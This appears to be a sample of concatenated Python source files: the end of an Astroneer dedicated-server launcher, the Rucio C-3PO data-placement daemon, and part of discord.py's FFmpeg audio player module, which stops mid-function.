        pass
    # Kill current process (signal 9: immediate, no cleanup).
    try:
        os.kill(os.getpid(), 9)
    except:
        pass
def start_WebHookLoop(self):
    """Run the Discord webhook sender loop on a background daemon thread."""
    webhookThread = Thread(
        target=AstroLogging.sendDiscordReqLoop, daemon=True)
    webhookThread.start()
if __name__ == "__main__":
    # Best-effort: set a friendly console window title (Windows `title`).
    try:
        os.system("title AstroLauncher - Unofficial Dedicated Server Launcher")
    except:
        pass
    try:
        # CLI: the same executable doubles as the watcher daemon (-d, with
        # both PIDs supplied) and as the interactive launcher (default).
        parser = argparse.ArgumentParser()
        parser.add_argument("-d", "--daemon", dest="daemon",
                            help="Set the launcher to run as a Daemon", action='store_true')
        parser.add_argument(
            "-c", "--consolepid", help="Set the consolePID for the Daemon", type=str.lower)
        parser.add_argument(
            "-l", "--launcherpid", help="Set the launcherPID for the Daemon", type=str.lower)
        parser.add_argument(
            "-p", "--path", help="Set the server folder path", type=str.lower)
        parser.add_argument("-U", "--noupdate", dest="noautoupdate", default=None,
                            help="Disable autoupdate if running as exe", action='store_true')
        parser.add_argument("-i", "--ini", dest="launcherINI", default="Launcher.ini",
                            help="Set the location of the Launcher INI")
        args = parser.parse_args()
        if args.daemon:
            if args.consolepid and args.launcherpid:
                # Daemon mode: hide the console window, then watch both PIDs.
                kernel32 = ctypes.WinDLL('kernel32')
                user32 = ctypes.WinDLL('user32')
                SW_HIDE = 0
                hWnd = kernel32.GetConsoleWindow()
                if hWnd:
                    user32.ShowWindow(hWnd, SW_HIDE)
                AstroDaemon().daemon(args.launcherpid, args.consolepid)
            else:
                print("Insufficient launch options!")
        else:
            AstroLauncher(
                args.path, disable_auto_update=args.noautoupdate, launcherINI=args.launcherINI)
    except KeyboardInterrupt:
        pass
    except Exception as err:
        # Last-chance handler: log the failing line number and exception.
        ermsg = ('FINAL Error on line {}'.format(
            sys.exc_info()[-1].tb_lineno), type(err).__name__, err)
        AstroLogging.logPrint(f"{ermsg}", "critical", True)
|
c3po.py | # -*- coding: utf-8 -*-
# Copyright 2015-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Thomas Beermann <thomas.beermann@cern.ch>, 2015-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2017-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
'''
Dynamic data placement daemon.
'''
import logging
from datetime import datetime
from hashlib import md5
from json import dumps
from threading import Event, Thread
from time import sleep
from uuid import uuid4
from requests import post
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from six import string_types
import rucio.db.sqla.util
from rucio.client import Client
from rucio.common import exception
from rucio.common.config import config_get, config_get_options
from rucio.common.logging import setup_logging
from rucio.common.types import InternalScope
from rucio.daemons.c3po.collectors.free_space import FreeSpaceCollector
from rucio.daemons.c3po.collectors.jedi_did import JediDIDCollector
from rucio.daemons.c3po.collectors.workload import WorkloadCollector
try:
from Queue import Queue
except ImportError:
from queue import Queue
GRACEFUL_STOP = Event()
def read_free_space(once=False, thread=0, waiting_time=1800):
    """
    Thread to collect the space usage information for RSEs.

    Collects immediately on startup and then every *waiting_time* seconds,
    polling the stop event every 10s so shutdown stays responsive.
    """
    collector = FreeSpaceCollector()
    elapsed = waiting_time
    while not GRACEFUL_STOP.is_set():
        if elapsed >= waiting_time:
            logging.info('collecting free space')
            collector.collect_free_space()
            elapsed = 0
        else:
            elapsed += 10
            sleep(10)
def read_workload(once=False, thread=0, waiting_time=1800):
    """
    Thread to collect the workload information from PanDA.

    Collects immediately on startup and then every *waiting_time* seconds,
    checking the stop event every 10s.
    """
    collector = WorkloadCollector()
    elapsed = waiting_time
    while not GRACEFUL_STOP.is_set():
        if elapsed >= waiting_time:
            logging.info('collecting workload')
            collector.collect_workload()
            elapsed = 0
        else:
            elapsed += 10
            sleep(10)
def print_workload(once=False, thread=0, waiting_time=600):
    """
    Thread to regularly output the workload to logs for debugging.

    Every *waiting_time* seconds logs the number of cached sites and, per
    site, the current / average / maximum job counts.
    """
    workload_collector = WorkloadCollector()
    timer = waiting_time
    while not GRACEFUL_STOP.is_set():
        if timer < waiting_time:
            timer += 10
            sleep(10)
            continue
        # Idiom fix: pass format args lazily to logging instead of eagerly
        # %-formatting, so the work is skipped when INFO is disabled.
        logging.info('Number of sites cached %d',
                     len(workload_collector.get_sites()))
        for site in workload_collector.get_sites():
            logging.info('%s: %d / %d / %d', site,
                         workload_collector.get_cur_jobs(site),
                         workload_collector.get_avg_jobs(site),
                         workload_collector.get_max_jobs(site))
        timer = 0
def read_dids(once=False, thread=0, did_collector=None, waiting_time=60):
    """
    Thread to collect DIDs for the placement algorithm.

    Asks *did_collector* for new DIDs immediately and then every
    *waiting_time* seconds, checking the stop event every 10s.
    """
    countdown = waiting_time
    while not GRACEFUL_STOP.is_set():
        if countdown >= waiting_time:
            did_collector.get_dids()
            countdown = 0
        else:
            countdown += 10
            sleep(10)
def add_rule(client, did, src_rse, dst_rse):
    """Create an asynchronous one-week replication rule for *did* on *dst_rse*.

    The rule is owned by the 'c3po' account, tagged with the
    'Data Brokering' activity, and constrained to source *src_rse*.
    """
    logging.debug('add rule for %s from %s to %s' % (did, src_rse, dst_rse))
    result = client.add_replication_rule(
        [did, ],
        1,
        dst_rse,
        lifetime=604800,
        account='c3po',
        source_replica_expression=src_rse,
        activity='Data Brokering',
        asynchronous=True)
    logging.debug(result)
def place_replica(once=False,
                  thread=0,
                  did_queue=None,
                  waiting_time=100,
                  dry_run=False,
                  sampling=False,
                  algorithms='t2_free_space_only_pop_with_network',
                  datatypes='NTUP,DAOD',
                  dest_rse_expr='type=DATADISK',
                  max_bytes_hour=100000000000000,
                  max_files_hour=100000,
                  max_bytes_hour_rse=50000000000000,
                  max_files_hour_rse=10000,
                  min_popularity=8,
                  min_recent_requests=5,
                  max_replicas=5):
    """
    Thread to run the placement algorithm to decide if and where to put new replicas.

    Drains *did_queue* every *waiting_time* seconds, runs each configured
    placement algorithm on every DID, records every decision in
    ElasticSearch for offline analysis, and (unless dry_run) creates the
    replication rule.  With *sampling* on, roughly half of the decisions
    (chosen by the DID's md5) actually create rules, forming a control
    group.
    """
    try:
        c3po_options = config_get_options('c3po')
        client = None
        # The config file overrides the keyword default for the algorithms.
        if 'algorithms' in c3po_options:
            algorithms = config_get('c3po', 'algorithms')
        algorithms = algorithms.split(',')
        if not dry_run:
            if len(algorithms) != 1:
                logging.error('Multiple algorithms are only allowed in dry_run mode')
                return
            client = Client(auth_type='x509_proxy', account='c3po', creds={'client_proxy': '/opt/rucio/etc/ddmadmin.long.proxy'})
        # NOTE(review): in dry_run mode `client` stays None, so this access
        # raises AttributeError and the daemon dies via the outer handler
        # — confirm whether dry_run is expected to work at all here.
        vo = client.vo
        instances = {}
        for algorithm in algorithms:
            # Dynamically import rucio.daemons.c3po.algorithms.<name>.
            module_path = 'rucio.daemons.c3po.algorithms.' + algorithm
            module = __import__(module_path, globals(), locals(), ['PlacementAlgorithm'])
            instance = module.PlacementAlgorithm(datatypes, dest_rse_expr, max_bytes_hour, max_files_hour, max_bytes_hour_rse, max_files_hour_rse, min_popularity, min_recent_requests, max_replicas)
            instances[algorithm] = instance

        # These parameters are attached to every decision document sent
        # to ElasticSearch.
        params = {
            'dry_run': dry_run,
            'sampling': sampling,
            'datatypes': datatypes,
            'dest_rse_expr': dest_rse_expr,
            'max_bytes_hour': max_bytes_hour,
            'max_files_hour': max_files_hour,
            'max_bytes_hour_rse': max_bytes_hour_rse,
            'max_files_hour_rse': max_files_hour_rse,
            'min_recent_requests': min_recent_requests,
            'min_popularity': min_popularity
        }
        # Short id distinguishing this daemon instance in the logs/ES.
        instance_id = str(uuid4()).split('-')[0]
        elastic_url = config_get('c3po', 'elastic_url')
        elastic_index = config_get('c3po', 'elastic_index')
        ca_cert = False
        if 'ca_cert' in c3po_options:
            ca_cert = config_get('c3po', 'ca_cert')
        auth = False
        if ('elastic_user' in c3po_options) and ('elastic_pass' in c3po_options):
            auth = HTTPBasicAuth(config_get('c3po', 'elastic_user'), config_get('c3po', 'elastic_pass'))
        w = waiting_time
        while not GRACEFUL_STOP.is_set():
            # Sleep in 10s slices until a full waiting period has passed.
            if w < waiting_time:
                w += 10
                sleep(10)
                continue
            len_dids = did_queue.qsize()
            if len_dids > 0:
                logging.debug('(%s) %d did(s) in queue' % (instance_id, len_dids))
            else:
                logging.debug('(%s) no dids in queue' % (instance_id))
            for _ in range(0, len_dids):
                did = did_queue.get()
                # Normalize a plain string scope into an InternalScope.
                if isinstance(did[0], string_types):
                    did[0] = InternalScope(did[0], vo=vo)
                for algorithm, instance in instances.items():
                    logging.info('(%s:%s) Retrieved %s:%s from queue. Run placement algorithm' % (algorithm, instance_id, did[0], did[1]))
                    decision = instance.place(did)
                    decision['@timestamp'] = datetime.utcnow().isoformat()
                    decision['algorithm'] = algorithm
                    decision['instance_id'] = instance_id
                    decision['params'] = params
                    create_rule = True
                    # Sampling: the md5 of the DID deterministically splits
                    # decisions ~50/50 into rule/no-rule groups.
                    if sampling and 'error_reason' not in decision:
                        create_rule = bool(ord(md5(decision['did']).hexdigest()[-1]) & 1)
                    decision['create_rule'] = create_rule
                    # write the output to ES for further analysis
                    index_url = elastic_url + '/' + elastic_index + '-' + datetime.utcnow().strftime('%Y-%m') + '/record/'
                    try:
                        if ca_cert:
                            r = post(index_url, data=dumps(decision), verify=ca_cert, auth=auth)
                        else:
                            r = post(index_url, data=dumps(decision))
                        if r.status_code != 201:
                            logging.error(r)
                            logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
                    except RequestException as e:
                        # ES failure skips this algorithm's rule creation too.
                        logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
                        logging.error(e)
                        continue
                    logging.debug(decision)
                    if 'error_reason' in decision:
                        logging.error('(%s:%s) The placement algorithm ran into an error: %s' % (algorithm, instance_id, decision['error_reason']))
                        continue
                    logging.info('(%s:%s) Decided to place a new replica for %s on %s' % (algorithm, instance_id, decision['did'], decision['destination_rse']))
                    if (not dry_run) and create_rule:
                        # DO IT!
                        try:
                            add_rule(client, {'scope': did[0].external, 'name': did[1]}, decision.get('source_rse'), decision.get('destination_rse'))
                        except exception.RucioException as e:
                            logging.debug(e)
            w = 0
    except Exception as e:
        logging.critical(e)
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signal-handler compatible: sets the shared stop event so every worker
    loop drains its current iteration and exits.
    """
    GRACEFUL_STOP.set()
def run(once=False,
        threads=1,
        only_workload=False,
        dry_run=False,
        sampling=False,
        algorithms='t2_free_space_only_pop_with_network',
        datatypes='NTUP,DAOD',
        dest_rse_expr='type=DATADISK',
        max_bytes_hour=100000000000000,
        max_files_hour=100000,
        max_bytes_hour_rse=50000000000000,
        max_files_hour_rse=10000,
        min_popularity=8,
        min_recent_requests=5,
        max_replicas=5):
    """
    Starts up the main thread

    Wires together the collector and placement worker threads and joins
    them until they finish (or the process is interrupted).  With
    *only_workload* set, only the workload collector/printer run; the
    remaining keyword arguments are forwarded to place_replica().
    """
    setup_logging()
    # Refuse to start against an outdated database schema.
    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')
    logging.info('activating C-3PO')
    thread_list = []
    try:
        if only_workload:
            logging.info('running in workload-collector-only mode')
            thread_list.append(Thread(target=read_workload, name='read_workload', kwargs={'thread': 0, 'waiting_time': 1800}))
            thread_list.append(Thread(target=print_workload, name='print_workload', kwargs={'thread': 0, 'waiting_time': 600}))
        else:
            logging.info('running in placement mode')
            # The DID queue links the collector thread to the placer thread.
            did_queue = Queue()
            dc = JediDIDCollector(did_queue)
            thread_list.append(Thread(target=read_free_space, name='read_free_space', kwargs={'thread': 0, 'waiting_time': 1800}))
            thread_list.append(Thread(target=read_dids, name='read_dids', kwargs={'thread': 0, 'did_collector': dc}))
            thread_list.append(Thread(target=place_replica, name='place_replica', kwargs={'thread': 0,
                                                                                          'did_queue': did_queue,
                                                                                          'waiting_time': 10,
                                                                                          'algorithms': algorithms,
                                                                                          'dry_run': dry_run,
                                                                                          'sampling': sampling,
                                                                                          'datatypes': datatypes,
                                                                                          'dest_rse_expr': dest_rse_expr,
                                                                                          'max_bytes_hour': max_bytes_hour,
                                                                                          'max_files_hour': max_files_hour,
                                                                                          'max_bytes_hour_rse': max_bytes_hour_rse,
                                                                                          'max_files_hour_rse': max_files_hour_rse,
                                                                                          'min_popularity': min_popularity,
                                                                                          'min_recent_requests': min_recent_requests,
                                                                                          'max_replicas': max_replicas}))
        for t in thread_list:
            t.start()
        logging.info('waiting for interrupts')
        # Join with a timeout so KeyboardInterrupt can be delivered.
        while len(thread_list) > 0:
            [t.join(timeout=3) for t in thread_list if t and t.is_alive()]
    except Exception as error:
        logging.critical(error)
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
    """Represents an audio stream.

    The audio stream can be Opus encoded or not, however if the audio stream
    is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.

    .. warning::

        The audio source reads are done in a separate thread.
    """

    def read(self) -> bytes:
        """Reads 20ms worth of audio.

        Subclasses must implement this.

        Returning an empty :term:`py:bytes-like object` signals that the
        audio is complete.  When :meth:`~AudioSource.is_opus` returns
        ``True`` the data must be 20ms of Opus encoded audio; otherwise it
        must be 20ms of 16-bit 48KHz stereo PCM (about 3,840 bytes per
        frame).

        Returns
        --------
        :class:`bytes`
            A bytes like object that represents the PCM or Opus data.
        """
        raise NotImplementedError

    def is_opus(self) -> bool:
        """Checks if the audio source is already encoded in Opus."""
        # Sources default to raw PCM; Opus-producing subclasses override.
        return False

    def cleanup(self) -> None:
        """Called when clean-up is needed to be done.

        Useful for clearing buffer data or processes after
        it is done playing audio.
        """
        pass

    def __del__(self) -> None:
        # Best-effort cleanup when the source is garbage collected.
        self.cleanup()
class PCMAudio(AudioSource):
    """An :class:`AudioSource` backed by raw 16-bit 48KHz stereo PCM.

    Attributes
    -----------
    stream: :term:`py:file object`
        A file-like object yielding raw PCM byte data.
    """

    def __init__(self, stream: io.BufferedIOBase) -> None:
        self.stream: io.BufferedIOBase = stream

    def read(self) -> bytes:
        frame = self.stream.read(OpusEncoder.FRAME_SIZE)
        # A short read means the stream is exhausted; signal end-of-stream.
        return frame if len(frame) == OpusEncoder.FRAME_SIZE else b''
class FFmpegAudio(AudioSource):
    """Represents an FFmpeg (or AVConv) based AudioSource.
    User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.
    .. versionadded:: 1.3
    """
    def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
        # Piping mode: the caller passes a file-like object whose bytes are fed
        # to ffmpeg's stdin by a background writer thread (started below).
        piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
        if piping and isinstance(source, str):
            raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
        args = [executable, *args]
        kwargs = {'stdout': subprocess.PIPE}
        kwargs.update(subprocess_kwargs)
        self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
        self._stdout: IO[bytes] = self._process.stdout # type: ignore
        self._stdin: Optional[IO[bytes]] = None
        self._pipe_thread: Optional[threading.Thread] = None
        if piping:
            # Daemon thread so a stuck write never blocks interpreter exit.
            n = f'popen-stdin-writer:{id(self):#x}'
            self._stdin = self._process.stdin
            self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
            self._pipe_thread.start()
    def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
        """Spawn the ffmpeg process, translating spawn failures into ClientException."""
        process = None
        try:
            process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
        except FileNotFoundError:
            # args may be a single command string or an argv list.
            executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
            raise ClientException(executable + ' was not found.') from None
        except subprocess.SubprocessError as exc:
            raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
        else:
            return process
    def _kill_process(self) -> None:
        """Kill the subprocess and wait for it to exit; safe to call after cleanup()."""
        proc = self._process
        if proc is MISSING:
            # cleanup() already ran; nothing to do.
            return
        _log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
        try:
            proc.kill()
        except Exception:
            _log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
        if proc.poll() is None:
            # communicate() drains pipes and blocks until the process exits,
            # avoiding a zombie process.
            _log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
            proc.communicate()
            _log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
        else:
            _log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
    def _pipe_writer(self, source: io.BufferedIOBase) -> None:
        """Background thread body: stream bytes from ``source`` into ffmpeg's stdin."""
        while self._process:
            # arbitrarily large read size
            data = source.read(8192)
            if not data:
                self._process.terminate()
                return
            try:
                self._stdin.write(data)
            except Exception:
                _log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
                # at this point the source data is either exhausted or the process is fubar
                self._process.terminate()
                return
    def cleanup(self) -> None:
        # Replace handles with the MISSING sentinel so repeated cleanup is a no-op.
        self._kill_process()
        self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
    """An audio source from FFmpeg (or AVConv).

    A subprocess is launched for the given input and its stdout is consumed
    as raw 16-bit 48KHz stereo PCM.

    .. warning::

        The ffmpeg or avconv executable must be locatable through your path
        environment variable for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to PCM bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        executable: str = 'ffmpeg',
        pipe: bool = False,
        stderr: Optional[IO[str]] = None,
        before_options: Optional[str] = None,
        options: Optional[str] = None
    ) -> None:
        subprocess_kwargs = {
            'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL,
            'stderr': stderr,
        }

        cmdline = []
        if isinstance(before_options, str):
            cmdline += shlex.split(before_options)
        # '-' tells ffmpeg to read its input from stdin when piping.
        cmdline += ['-i', '-' if pipe else source]
        # Force output to raw signed 16-bit little-endian, 48KHz, stereo.
        cmdline += ['-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning']
        if isinstance(options, str):
            cmdline += shlex.split(options)
        cmdline += ['pipe:1']

        super().__init__(source, executable=executable, args=cmdline, **subprocess_kwargs)

    def read(self) -> bytes:
        data = self._stdout.read(OpusEncoder.FRAME_SIZE)
        # Anything shorter than a full frame means the stream has ended.
        return data if len(data) == OpusEncoder.FRAME_SIZE else b''

    def is_opus(self) -> bool:
        return False
class FFmpegOpusAudio(FFmpegAudio):
    """An audio source from FFmpeg (or AVConv).

    This launches a sub-process to a specific input file given. However, rather than
    producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
    Opus, this class produces Opus packets, skipping the encoding step done by the library.

    Alternatively, instead of instantiating this class directly, you can use
    :meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
    can be used to opportunistically skip pointless re-encoding of existing Opus audio data
    for a boost in performance at the cost of a short initial delay to gather the information.
    The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
    know that the input source is Opus encoded beforehand.

    .. versionadded:: 1.3

    .. warning::

        You must have the ffmpeg or avconv executable in your path environment
        variable in order for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to Opus bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    bitrate: :class:`int`
        The bitrate in kbps to encode the output to. Defaults to ``128``.
    codec: Optional[:class:`str`]
        The codec to use to encode the audio data. Normally this would be
        just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
        opportunistically skip pointlessly re-encoding Opus audio data by passing
        ``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
        ``libopus`` will be considered ``libopus``. Defaults to ``libopus``.

        .. warning::

            Do not provide this parameter unless you are certain that the audio input is
            already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
            should be used to determine the proper value for this parameter.

    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        bitrate: int = 128,
        codec: Optional[str] = None,
        executable: str = 'ffmpeg',
        pipe: bool = False,
        stderr: Optional[IO[str]] = None,
        before_options: Optional[str] = None,
        options: Optional[str] = None,
    ) -> None:
        args = []
        subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}

        if isinstance(before_options, str):
            args.extend(shlex.split(before_options))

        args.append('-i')
        args.append('-' if pipe else source)

        # BUGFIX: 'copy' was previously absent from this tuple, so explicitly
        # passing codec='copy' (documented above as a supported value) fell
        # through to the else branch and re-encoded with libopus anyway.
        # Probed codecs of 'opus'/'libopus' still map to 'copy' so ffmpeg
        # stream-copies the already-Opus data instead of re-encoding it.
        codec = 'copy' if codec in ('copy', 'opus', 'libopus') else 'libopus'

        args.extend(('-map_metadata', '-1',
                     '-f', 'opus',
                     '-c:a', codec,
                     '-ar', '48000',
                     '-ac', '2',
                     '-b:a', f'{bitrate}k',
                     '-loglevel', 'warning'))

        if isinstance(options, str):
            args.extend(shlex.split(options))

        args.append('pipe:1')

        super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
        # ffmpeg emits an Ogg container; Opus packets are pulled out of it lazily.
        self._packet_iter = OggStream(self._stdout).iter_packets()

    @classmethod
    async def from_probe(
        cls: Type[FT],
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        **kwargs: Any,
    ) -> FT:
        """|coro|

        A factory method that creates a :class:`FFmpegOpusAudio` after probing
        the input source for audio codec and bitrate information.

        Examples
        ----------
        Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::

            source = await discord.FFmpegOpusAudio.from_probe("song.webm")
            voice_client.play(source)

        If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
        to probe using ffmpeg instead: ::

            source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
            voice_client.play(source)

        Using a custom method of determining codec and bitrate: ::

            def custom_probe(source, executable):
                # some analysis code here
                return codec, bitrate

            source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
            voice_client.play(source)

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for the constructor.
        method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
            The probing method used to determine bitrate and codec information. As a string, valid
            values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
            (or avconv). As a callable, it must take two string arguments, ``source`` and
            ``executable``. Both parameters are the same values passed to this factory function.
            ``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
        kwargs
            The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
            excluding ``bitrate`` and ``codec``.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        --------
        :class:`FFmpegOpusAudio`
            An instance of this class.
        """
        executable = kwargs.get('executable')
        codec, bitrate = await cls.probe(source, method=method, executable=executable)
        return cls(source, bitrate=bitrate, codec=codec, **kwargs)  # type: ignore

    @classmethod
    async def probe(
        cls,
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        executable: Optional[str] = None,
    ) -> Tuple[Optional[str], Optional[int]]:
        """|coro|

        Probes the input source for bitrate and codec information.

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
        method
            Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
        executable: :class:`str`
            Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        ---------
        Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
            A 2-tuple with the codec and bitrate of the input source.
        """
        method = method or 'native'
        executable = executable or 'ffmpeg'
        probefunc = fallback = None

        if isinstance(method, str):
            probefunc = getattr(cls, '_probe_codec_' + method, None)
            if probefunc is None:
                raise AttributeError(f"Invalid probe method {method!r}")
            if probefunc is cls._probe_codec_native:
                fallback = cls._probe_codec_fallback
        elif callable(method):
            probefunc = method
            fallback = cls._probe_codec_fallback
        else:
            raise TypeError("Expected str or callable for parameter 'probe', "
                            f"not '{method.__class__.__name__}'")

        codec = bitrate = None
        loop = asyncio.get_event_loop()
        try:
            # Probing shells out to ffprobe/ffmpeg, so run it off the event loop.
            codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable))  # type: ignore
        except Exception:
            if not fallback:
                _log.exception("Probe '%s' using '%s' failed", method, executable)
                return  # type: ignore
            _log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
            try:
                codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable))  # type: ignore
            except Exception:
                _log.exception("Fallback probe using '%s' failed", executable)
            else:
                _log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
        else:
            _log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
        finally:
            # Deliberate return-in-finally: probing is best-effort, so whatever
            # was gathered (possibly (None, None)) is always returned.
            return codec, bitrate

    @staticmethod
    def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
        """Probe codec/bitrate with ffprobe (or avprobe) via its JSON output."""
        # 'ffmpeg' -> 'ffprobe', 'avconv' -> 'avprobe'; custom executables are used as-is.
        exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
        args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
        output = subprocess.check_output(args, timeout=20)
        codec = bitrate = None
        if output:
            data = json.loads(output)
            streamdata = data['streams'][0]
            codec = streamdata.get('codec_name')
